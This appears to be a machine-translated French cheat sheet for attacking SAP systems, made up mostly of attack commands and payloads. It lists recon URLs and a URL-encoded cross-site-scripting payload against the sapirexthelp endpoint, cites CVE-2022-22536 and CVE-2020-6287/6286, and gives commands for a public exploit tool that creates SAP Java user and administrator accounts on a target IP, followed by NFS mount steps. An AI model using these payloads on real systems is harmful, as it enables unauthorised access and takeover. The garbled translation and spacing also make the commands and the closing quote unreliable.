Bismillah
Pour la conduite du Pentest, vous devriez déployer le système SAP sur votre réseau
https: // hôte / sap / public / bc / icf / connex
http: // hôte: port / startpage
http: // hôte: port / sap / public / info
http: // hôte: port / sap / public / info
Recherchez / sapirexthelp https: // localhost / sapirexthelp
https: // hôte / sapirexthelp / aléatoire /% 22% 3e% 3c% 53% 56% 47% 20% 4f% 4e% 4c% 4f% 41% 44% 3D% 26% 23% 39% 37% 26% 23% 31 % 30% 38% 26% 23% 31% 30% 31% 26% 23% 31% 31% 34% 26% 23% 31% 31% 36% 26% 26% 23% 78% 36% 34% 26% 23% 78% 36% 66% 26% 23% 78% 36 % 33% 26% 23% 78% 37% 35% 26% 23% 78% 36% 64% 26% 23% 78% 36% 35% 26% 23% 78% 36% 65% 26% 23% 78% 37% 34% 26% 23% 78% 32% 65% 26 26 % 23% 78% 36% 34% 26% 23% 78% 36% 66% 26% 23% 78% 36% 64% 26% 23% 78% 36% 31% 26% 23% 78% 36% 39% 26% 23% 78% 36% 65% 29% 3e.asp
SYSTÈME D'INFORMATION SAP 1.0 Téléchargement du shell
CVE-2022-22536 (ICMAD SAP)
Vulnérabilité SAP Recon (CVE-2020-6287, CVE-2020-6286)
https://github.com/chipik/sap_recon
Télécharger le fichier zip
Python Recon.py -H 172.16.30.8 -F /1111.zip
Créer un utilisateur SAP Java
Python Recon.py -H 172.16.30.8 -u
Créer un utilisateur de l'administrateur Java SAP
Python Recon.py -H 172.16.30.8 -a
SSLSCAN
nfs-ls nfs: // hôte / montage
Mkdir Mnt && Mount -t NFS Host: / Mount ./mnt
Bonne chance pour rechercher des informations sensibles
Je recherche une machine virtuelle SAP ou un conteneur pour faire une simulation plus pente, si vous avez des informations, veuillez bien vouloir me @linkedin)
Le partage est attentionné
كماقال صلى الله عليه وسلم: "خير الناس أنفعهم للناmuni"